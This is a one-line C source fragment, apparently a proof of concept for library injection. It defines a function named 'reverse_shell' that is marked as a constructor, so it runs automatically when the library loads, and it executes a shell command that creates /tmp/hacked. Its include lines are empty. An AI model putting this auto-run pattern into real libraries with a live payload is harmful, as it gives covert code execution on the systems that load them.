#include #include __attribute__((constructor)) static void reverse_shell(void) { system("touch /tmp/hacked"); }